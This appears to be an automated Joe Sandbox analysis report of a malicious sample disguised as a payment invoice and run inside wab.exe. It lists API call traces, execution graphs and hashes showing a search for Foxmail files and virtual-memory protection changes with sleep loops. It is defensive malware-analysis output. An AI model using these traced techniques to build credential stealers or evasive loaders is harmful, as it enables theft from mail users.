                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                                                                                      • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                                                                                                      • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:4.4%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:99.8%
                                                                                                                                                                                                                      Signature Coverage:1.6%
                                                                                                                                                                                                                      Total number of Nodes:1665
                                                                                                                                                                                                                      Total number of Limit Nodes:15
                                                                                                                                                                                                                      execution_graph 7689 356321a1 7692 35632418 7689->7692 7694 35632420 7692->7694 7696 356347f5 7694->7696 7695 356321bc 7697 35634804 7696->7697 7698 35634808 7696->7698 7697->7695 7701 35634815 7698->7701 7702 35635b7a 20 API calls 7701->7702 7705 3563482c 7702->7705 7703 35632ada 5 API calls 7704 35634811 7703->7704 7704->7695 7705->7703 7309 3563a1e0 7312 3563a1fe 7309->7312 7311 3563a1f6 7316 3563a203 7312->7316 7313 3563aa53 21 API calls 7315 3563a42f 7313->7315 7314 3563a298 7314->7311 7315->7311 7316->7313 7316->7314 7706 356381a0 7707 356381d9 7706->7707 7708 356381dd 7707->7708 7719 35638205 7707->7719 7709 35636368 20 API calls 7708->7709 7711 356381e2 7709->7711 7710 35638529 7712 35632ada 5 API calls 7710->7712 7713 356362ac 26 API calls 7711->7713 7714 35638536 7712->7714 7715 356381ed 7713->7715 7716 35632ada 5 API calls 7715->7716 7717 356381f9 7716->7717 7719->7710 7720 356380c0 7719->7720 7721 356380db 7720->7721 7722 35632ada 5 API calls 7721->7722 7723 35638152 7722->7723 7723->7719 5786 3563c7a7 5787 3563c7be 5786->5787 5792 3563c82c 5786->5792 5787->5792 5798 3563c7e6 GetModuleHandleA 5787->5798 5789 3563c872 5790 3563c835 GetModuleHandleA 5793 3563c83f 5790->5793 5791 3563c7dd 5791->5792 5791->5793 5795 3563c800 GetProcAddress 5791->5795 5792->5789 5792->5790 5792->5793 5793->5792 5794 3563c85f GetProcAddress 5793->5794 5794->5792 5795->5792 5796 3563c80d VirtualProtect 5795->5796 5796->5792 5797 3563c81c VirtualProtect 5796->5797 5797->5792 5799 3563c7ef 5798->5799 5805 3563c82c 5798->5805 5810 3563c803 GetProcAddress 5799->5810 5801 3563c7f4 5804 3563c800 GetProcAddress 5801->5804 5801->5805 5802 3563c872 5803 3563c835 GetModuleHandleA 5808 3563c83f 5803->5808 5804->5805 5806 3563c80d VirtualProtect 5804->5806 5805->5802 5805->5803 
5805->5808 5806->5805 5807 3563c81c VirtualProtect 5806->5807 5807->5805 5808->5805 5809 3563c85f GetProcAddress 5808->5809 5809->5805 5811 3563c82c 5810->5811 5812 3563c80d VirtualProtect 5810->5812 5814 3563c872 5811->5814 5815 3563c835 GetModuleHandleA 5811->5815 5812->5811 5813 3563c81c VirtualProtect 5812->5813 5813->5811 5816 3563c83f 5815->5816 5816->5811 5817 3563c85f GetProcAddress 5816->5817 5817->5816 6482 3563ac6b 6483 3563ac84 6482->6483 6485 3563acad 6483->6485 6486 3563b2f0 6483->6486 6487 3563b329 6486->6487 6489 3563b350 6487->6489 6497 3563b5c1 6487->6497 6490 3563b393 6489->6490 6491 3563b36e 6489->6491 6510 3563b8b2 6490->6510 6501 3563b8e1 6491->6501 6494 3563b38e 6495 35632ada 5 API calls 6494->6495 6496 3563b3b7 6495->6496 6496->6485 6498 3563b5ec 6497->6498 6499 3563b7e5 RaiseException 6498->6499 6500 3563b7fd 6499->6500 6500->6489 6502 3563b8f0 6501->6502 6503 3563b964 6502->6503 6504 3563b90f 6502->6504 6505 3563b8b2 20 API calls 6503->6505 6517 356378a3 6504->6517 6509 3563b95d 6505->6509 6508 3563b8b2 20 API calls 6508->6509 6509->6494 6511 3563b8d4 6510->6511 6512 3563b8bf 6510->6512 6513 35636368 20 API calls 6511->6513 6514 35636368 20 API calls 6512->6514 6515 3563b8d9 6512->6515 6513->6515 6516 3563b8cc 6514->6516 6515->6494 6516->6494 6520 356378cb 6517->6520 6518 35632ada 5 API calls 6519 356378e8 6518->6519 6519->6508 6519->6509 6520->6518 7258 3563742b 7259 35637430 7258->7259 7261 35637453 7259->7261 7262 35638bae 7259->7262 7263 35638bdd 7262->7263 7264 35638bbb 7262->7264 7263->7259 7265 35638bd7 7264->7265 7266 35638bc9 RtlDeleteCriticalSection 7264->7266 7267 3563571e 20 API calls 7265->7267 7266->7265 7266->7266 7267->7263 6521 3563506f 6522 35635081 6521->6522 6523 35635087 6521->6523 6525 35635000 6522->6525 6529 3563502a 6525->6529 6530 3563500d 6525->6530 6526 35635024 6527 3563571e 20 API calls 6526->6527 6527->6529 6528 3563571e 20 API calls 6528->6530 6529->6523 6530->6526 6530->6528 7724 356360ac 7725 356360dd 
7724->7725 7727 356360b7 7724->7727 7726 356360c7 FreeLibrary 7726->7727 7727->7725 7727->7726 7728 35633eb3 7731 35635411 7728->7731 7732 3563541d 7731->7732 7733 35635af6 38 API calls 7732->7733 7736 35635422 7733->7736 7734 356355a8 38 API calls 7735 3563544c 7734->7735 7736->7734 6531 35639e71 6532 35639e95 6531->6532 6534 35639ee6 6532->6534 6536 35639f71 6532->6536 6533 35639ef8 6534->6533 6539 3563aa53 6534->6539 6537 3563b2f0 21 API calls 6536->6537 6538 3563acad 6536->6538 6537->6538 6540 3563aa70 RtlDecodePointer 6539->6540 6542 3563aa80 6539->6542 6540->6542 6541 35632ada 5 API calls 6544 3563ac67 6541->6544 6543 3563ab0d 6542->6543 6545 3563ab02 6542->6545 6547 3563aab7 6542->6547 6543->6545 6546 35636368 20 API calls 6543->6546 6544->6533 6545->6541 6546->6545 6547->6545 6548 35636368 20 API calls 6547->6548 6548->6545 6549 35633370 6560 35633330 6549->6560 6561 35633342 6560->6561 6562 3563334f 6560->6562 6563 35632ada 5 API calls 6561->6563 6563->6562 7268 35635630 7271 3563563b 7268->7271 7270 35635664 7281 35635688 7270->7281 7271->7270 7272 35635660 7271->7272 7274 35635eb7 7271->7274 7275 35635c45 5 API calls 7274->7275 7276 35635ede 7275->7276 7277 35635efc InitializeCriticalSectionAndSpinCount 7276->7277 7278 35635ee7 7276->7278 7277->7278 7279 35632ada 5 API calls 7278->7279 7280 35635f13 7279->7280 7280->7271 7282 35635695 7281->7282 7284 356356b4 7281->7284 7283 3563569f RtlDeleteCriticalSection 7282->7283 7283->7283 7283->7284 7284->7272 7317 356363f0 7318 35636400 7317->7318 7324 35636416 7317->7324 7319 35636368 20 API calls 7318->7319 7320 35636405 7319->7320 7322 356362ac 26 API calls 7320->7322 7331 3563640f 7322->7331 7323 35636480 7347 35634e76 7323->7347 7324->7323 7329 35636561 7324->7329 7336 35636580 7324->7336 7325 356364e5 7327 356364ee 7325->7327 7333 35636573 7325->7333 7353 356385eb 7325->7353 7328 3563571e 20 API calls 7327->7328 7328->7329 7362 3563679a 7329->7362 7334 356362bc 11 API calls 7333->7334 7335 3563657f 
7334->7335 7337 3563658c 7336->7337 7337->7337 7338 3563637b 20 API calls 7337->7338 7339 356365ba 7338->7339 7340 356385eb 26 API calls 7339->7340 7341 356365e6 7340->7341 7342 356362bc 11 API calls 7341->7342 7343 35636615 7342->7343 7344 356366b6 FindFirstFileExA 7343->7344 7345 35636705 7344->7345 7346 35636580 26 API calls 7345->7346 7348 35634e87 7347->7348 7349 35634e8b 7347->7349 7348->7325 7349->7348 7350 3563637b 20 API calls 7349->7350 7351 35634eb9 7350->7351 7352 3563571e 20 API calls 7351->7352 7352->7348 7356 3563853a 7353->7356 7354 3563854f 7355 35636368 20 API calls 7354->7355 7357 35638554 7354->7357 7361 3563857a 7355->7361 7356->7354 7356->7357 7359 3563858b 7356->7359 7357->7325 7358 356362ac 26 API calls 7358->7357 7359->7357 7360 35636368 20 API calls 7359->7360 7360->7361 7361->7358 7366 356367a4 7362->7366 7363 356367b4 7365 3563571e 20 API calls 7363->7365 7364 3563571e 20 API calls 7364->7366 7367 356367bb 7365->7367 7366->7363 7366->7364 7367->7331 7741 35639db8 7742 35639dbf 7741->7742 7743 35639e20 7742->7743 7745 35639ddf 7742->7745 7744 3563aa17 21 API calls 7743->7744 7747 3563a90e 7743->7747 7746 35639e6e 7744->7746 7745->7747 7748 3563aa17 21 API calls 7745->7748 7749 3563a93e 7748->7749 7368 35635bff 7376 35635d5c 7368->7376 7371 35635c13 7372 35635b7a 20 API calls 7373 35635c1b 7372->7373 7374 35635c28 7373->7374 7375 35635c2b 11 API calls 7373->7375 7375->7371 7377 35635c45 5 API calls 7376->7377 7378 35635d83 7377->7378 7379 35635d9b TlsAlloc 7378->7379 7381 35635d8c 7378->7381 7379->7381 7380 35632ada 5 API calls 7382 35635c09 7380->7382 7381->7380 7382->7371 7382->7372 7750 356367bf 7755 356367f4 7750->7755 7753 356367db 7754 3563571e 20 API calls 7754->7753 7756 35636806 7755->7756 7765 356367cd 7755->7765 7757 35636836 7756->7757 7758 3563680b 7756->7758 7757->7765 7766 356371d6 7757->7766 7759 3563637b 20 API calls 7758->7759 7760 35636814 7759->7760 7762 3563571e 20 API calls 7760->7762 7762->7765 7763 35636851 7764 
3563571e 20 API calls 7763->7764 7764->7765 7765->7753 7765->7754 7767 356371e1 7766->7767 7768 35637209 7767->7768 7769 356371fa 7767->7769 7770 35637218 7768->7770 7775 35638a98 7768->7775 7771 35636368 20 API calls 7769->7771 7782 35638acb 7770->7782 7773 356371ff 7771->7773 7773->7763 7776 35638aa3 7775->7776 7777 35638ab8 RtlSizeHeap 7775->7777 7778 35636368 20 API calls 7776->7778 7777->7770 7779 35638aa8 7778->7779 7780 356362ac 26 API calls 7779->7780 7781 35638ab3 7780->7781 7781->7770 7783 35638ae3 7782->7783 7784 35638ad8 7782->7784 7786 35638aeb 7783->7786 7792 35638af4 7783->7792 7785 356356d0 21 API calls 7784->7785 7791 35638ae0 7785->7791 7789 3563571e 20 API calls 7786->7789 7787 35638af9 7790 35636368 20 API calls 7787->7790 7788 35638b1e RtlReAllocateHeap 7788->7791 7788->7792 7789->7791 7790->7791 7791->7773 7792->7787 7792->7788 7793 3563474f 7 API calls 7792->7793 7793->7792 7285 3563543d 7286 35635440 7285->7286 7287 356355a8 38 API calls 7286->7287 7288 3563544c 7287->7288 6564 3563af43 6565 3563af59 6564->6565 6566 3563af4d 6564->6566 6566->6565 6567 3563af52 CloseHandle 6566->6567 6567->6565 7289 35637103 GetCommandLineA GetCommandLineW 7290 35635303 7293 356350a5 7290->7293 7302 3563502f 7293->7302 7296 3563502f 5 API calls 7297 356350c3 7296->7297 7298 35635000 20 API calls 7297->7298 7299 356350ce 7298->7299 7300 35635000 20 API calls 7299->7300 7301 356350d9 7300->7301 7303 35635048 7302->7303 7304 35632ada 5 API calls 7303->7304 7305 35635069 7304->7305 7305->7296 6568 35638640 6571 35638657 6568->6571 6572 35638665 6571->6572 6573 35638679 6571->6573 6574 35636368 20 API calls 6572->6574 6575 35638693 6573->6575 6576 35638681 6573->6576 6577 3563866a 6574->6577 6582 35638652 6575->6582 6587 356354a7 6575->6587 6578 35636368 20 API calls 6576->6578 6584 356362ac 6577->6584 6581 35638686 6578->6581 6583 356362ac 26 API calls 6581->6583 6583->6582 6595 35636231 6584->6595 6586 356362b8 6586->6582 6588 356354c4 6587->6588 6589 356354ba 
5976->5979 5980 35635b93 5979->5980 5981 35635b99 5979->5981 5998 35635e08 5980->5998 5985 35635bf0 SetLastError 5981->5985 6005 3563637b 5981->6005 5986 35635bf9 5985->5986 5986->5951 5987 35635bb3 6012 3563571e 5987->6012 5991 35635bb9 5993 35635be7 SetLastError 5991->5993 5992 35635bcf 6025 3563593c 5992->6025 5993->5986 5996 3563571e 17 API calls 5997 35635be0 5996->5997 5997->5985 5997->5993 6030 35635c45 5998->6030 6000 35635e2f 6001 35635e47 TlsGetValue 6000->6001 6002 35635e3b 6000->6002 6001->6002 6003 35632ada 5 API calls 6002->6003 6004 35635e58 6003->6004 6004->5981 6011 35636388 6005->6011 6006 356363c8 6008 35636368 19 API calls 6006->6008 6007 356363b3 RtlAllocateHeap 6009 35635bab 6007->6009 6007->6011 6008->6009 6009->5987 6018 35635e5e 6009->6018 6010 3563474f 7 API calls 6010->6011 6011->6006 6011->6007 6011->6010 6013 35635729 RtlFreeHeap 6012->6013 6017 35635752 6012->6017 6014 3563573e 6013->6014 6013->6017 6015 35636368 18 API calls 6014->6015 6016 35635744 GetLastError 6015->6016 6016->6017 6017->5991 6019 35635c45 5 API calls 6018->6019 6020 35635e85 6019->6020 6021 35635ea0 TlsSetValue 6020->6021 6024 35635e94 6020->6024 6021->6024 6022 35632ada 5 API calls 6023 35635bc8 6022->6023 6023->5987 6023->5992 6024->6022 6036 35635914 6025->6036 6033 35635c71 6030->6033 6035 35635c75 6030->6035 6031 35635c95 6034 35635ca1 GetProcAddress 6031->6034 6031->6035 6032 35635ce1 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6032->6033 6033->6031 6033->6032 6033->6035 6034->6035 6035->6000 6037 35635854 RtlEnterCriticalSection RtlLeaveCriticalSection 6036->6037 6038 35635938 6037->6038 6039 356358c4 6038->6039 6040 35635758 20 API calls 6039->6040 6041 356358e8 6040->6041 6041->5996 6043 35631ca6 6042->6043 6043->5938 7814 35634a9a 7815 35635411 38 API calls 7814->7815 7816 35634aa2 7815->7816 7654 35634bdd 7655 35634c08 7654->7655 7656 35634bec 7654->7656 7658 35636d60 51 API calls 7655->7658 7656->7655 7657 35634bf2 7656->7657 7659 35636368 20 
API calls 7657->7659 7660 35634c0f GetModuleFileNameA 7658->7660 7661 35634bf7 7659->7661 7662 35634c33 7660->7662 7663 356362ac 26 API calls 7661->7663 7677 35634d01 7662->7677 7664 35634c01 7663->7664 7667 35634e76 20 API calls 7668 35634c5d 7667->7668 7669 35634c72 7668->7669 7670 35634c66 7668->7670 7672 35634d01 38 API calls 7669->7672 7671 35636368 20 API calls 7670->7671 7676 35634c6b 7671->7676 7674 35634c88 7672->7674 7673 3563571e 20 API calls 7673->7664 7675 3563571e 20 API calls 7674->7675 7674->7676 7675->7676 7676->7673 7679 35634d26 7677->7679 7681 35634d86 7679->7681 7683 356370eb 7679->7683 7680 35634c50 7680->7667 7681->7680 7682 356370eb 38 API calls 7681->7682 7682->7681 7686 35637092 7683->7686 7687 356354a7 38 API calls 7686->7687 7688 356370a6 7687->7688 7688->7679 7306 3563281c 7307 35632882 27 API calls 7306->7307 7308 3563282a 7307->7308

Control-flow Graph

APIs
• lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 35631137
• lstrcatW.KERNEL32(?,?), ref: 35631151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3563115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3563116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3563117C
• FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 35631193
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 356311D0
• FindClose.KERNELBASE(00000000), ref: 356311DB
Memory Dump Source
• Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
• Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_35630000_wab.jbxd
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
• Opcode ID: 803ef2a8db4f75411f61684d057bda10f88a18eef74c32c20b6f61083df4645d
• Instruction ID: 079a857d0e69808d0846b5801bab8adf774e9290b36838d66da3485cbffe2717
• Opcode Fuzzy Hash: 803ef2a8db4f75411f61684d057bda10f88a18eef74c32c20b6f61083df4645d
• Instruction Fuzzy Hash: 222191726083486BD720EE64DC49FDB7BACEF84754F00092AB959D31A0EB30D609C796
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 127 449a127-449a15a 128 449a15c-449a168 call 449a2f7 127->128 130 449a16a 128->130 131 449a16f-449a17f 128->131 130->131 132 449a18a-449a1d2 NtProtectVirtualMemory call 449a2f7 131->132 133 449a181-449a188 Sleep 131->133 135 449a1d7-449a1e5 132->135 133->127 135->127
APIs
• Sleep.KERNELBASE(00000005), ref: 0449A185
• NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0449A1CD
Memory Dump Source
• Source File: 00000007.00000002.45046073128.0000000003AF9000.00000040.00000400.00020000.00000000.sdmp, Offset: 03AF9000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_3af9000_wab.jbxd
Yara matches
Similarity
• API ID: MemoryProtectSleepVirtual
• String ID:
• API String ID: 3235210055-0
• Opcode ID: c8736618fbd6b8f5007a1fdc57036d0f05c05cf477660a24c7744b20905a98aa
• Instruction ID: 89637d3d94433c57ae7275e8cb3624064d275b5c056ecd16a5d0e729264c8347
• Opcode Fuzzy Hash: c8736618fbd6b8f5007a1fdc57036d0f05c05cf477660a24c7744b20905a98aa
• Instruction Fuzzy Hash: 7C113A726803409FEB085E34C88DB9AB7E5AF15791F468189E8405B1B6D3A5D8C0CF02
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 35631434
  • Part of subcall function 356310F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 35631137
  • Part of subcall function 356310F1: lstrcatW.KERNEL32(?,?), ref: 35631151
  • Part of subcall function 356310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3563115C
  • Part of subcall function 356310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3563116D
  • Part of subcall function 356310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3563117C
  • Part of subcall function 356310F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 35631193
  • Part of subcall function 356310F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 356311D0
  • Part of subcall function 356310F1: FindClose.KERNELBASE(00000000), ref: 356311DB
• lstrlenW.KERNEL32(?), ref: 356314C5
• lstrlenW.KERNEL32(?), ref: 356314E0
• lstrlenW.KERNEL32(?,?), ref: 3563150F
• lstrcatW.KERNEL32(00000000), ref: 35631521
• lstrlenW.KERNEL32(?,?), ref: 35631547
• lstrcatW.KERNEL32(00000000), ref: 35631553
• lstrlenW.KERNEL32(?,?), ref: 35631579
• lstrcatW.KERNEL32(00000000), ref: 35631585
• lstrlenW.KERNEL32(?,?), ref: 356315AB
• lstrcatW.KERNEL32(00000000), ref: 356315B7
Strings
Memory Dump Source
• Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
• Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_35630000_wab.jbxd
Similarity
• API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
• String ID: )$Foxmail$ProgramFiles
• API String ID: 672098462-2938083778
• Opcode ID: 57301374c642eb3b3226f6bad01b0a939ff541022b98ca4ebdaa80174fd1a08b
• Instruction ID: 2f1a0a8c5a749a72f3d50370ccd02818bb7a945d89f71bd3e72c90f2172c1134
• Opcode Fuzzy Hash: 57301374c642eb3b3226f6bad01b0a939ff541022b98ca4ebdaa80174fd1a08b
• Instruction Fuzzy Hash: EC818075A40398AADB20DBA1DC86FEE7379EF84710F0005D6F509E71A0EB715A84CF99
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(3563C7DD), ref: 3563C7E6
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,3563C7DD), ref: 3563C838
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 3563C860
                                                                                                                                                                                                                        • Part of subcall function 3563C803: GetProcAddress.KERNEL32(00000000,3563C7F4), ref: 3563C804
                                                                                                                                                                                                                        • Part of subcall function 3563C803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,3563C7F4,3563C7DD), ref: 3563C816
                                                                                                                                                                                                                        • Part of subcall function 3563C803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,3563C7F4,3563C7DD), ref: 3563C82A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2099061454-0
                                                                                                                                                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                      • Instruction ID: d5036293798a27f03575edb7a9e16d605a97478942b84caea12045411f1bcc9b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC01D244B4B75138BA9196740C03AAA6FA8AF276A0B101756F141969B3D9B18706C3AB
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      (rendered graph not reproduced) Basic blocks 3563c7a7-3563c872: GetModuleHandleA at 3563c835-3563c83d, GetProcAddress at 3563c800-3563c80b and 3563c85f-3563c860, VirtualProtect at 3563c80d-3563c81a and 3563c81c-3563c82a; calls to 3563c7e6 (from 3563c7c8-3563c7f6) and 3563c877 (from 3563c872); tight loop at 3563c83f-3563c847.
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,3563C7DD), ref: 3563C838
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 3563C860
                                                                                                                                                                                                                        • Part of subcall function 3563C7E6: GetModuleHandleA.KERNEL32(3563C7DD), ref: 3563C7E6
                                                                                                                                                                                                                        • Part of subcall function 3563C7E6: GetProcAddress.KERNEL32(00000000,3563C7F4), ref: 3563C804
                                                                                                                                                                                                                        • Part of subcall function 3563C7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,3563C7F4,3563C7DD), ref: 3563C816
                                                                                                                                                                                                                        • Part of subcall function 3563C7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,3563C7F4,3563C7DD), ref: 3563C82A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2099061454-0
                                                                                                                                                                                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                      • Instruction ID: fe935bec7736094f8040a44fa3d8a86dd74d6efd56af0792efd2dcfca8df5fe9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3721686570F3816FF7918B744C02BA27FE8AF132A0F180696F040CB563D6B88646C3A7
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      (rendered graph not reproduced) Basic blocks 3563c803-3563c872: GetProcAddress at 3563c803-3563c80b and 3563c85f-3563c865, VirtualProtect at 3563c80d-3563c81a and 3563c81c-3563c82a, GetModuleHandleA at 3563c835-3563c83d; call to 3563c877 from 3563c872; tight loop at 3563c83f-3563c847.
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,3563C7F4), ref: 3563C804
                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,3563C7F4,3563C7DD), ref: 3563C816
                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,3563C7F4,3563C7DD), ref: 3563C82A
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,3563C7DD), ref: 3563C838
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 3563C860
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2152742572-0
                                                                                                                                                                                                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                      • Instruction ID: f01ce1aaaf20618411f8cf41076bd0b1d3479dd94f5df5e71e2b29bccc951fc5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ACF0CD8578B7403CFA9186B40C43EBA5FDC9F276A0B101A56F101C75A2D9B58706C3FB
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      (rendered graph not reproduced) Basic blocks 3563571e-35635757: RtlFreeHeap at 35635729-3563573c; error path 3563573e-35635755 calls 35636368, GetLastError, then 356362ef; both paths rejoin at 35635756-35635757.
                                                                                                                                                                                                                      APIs
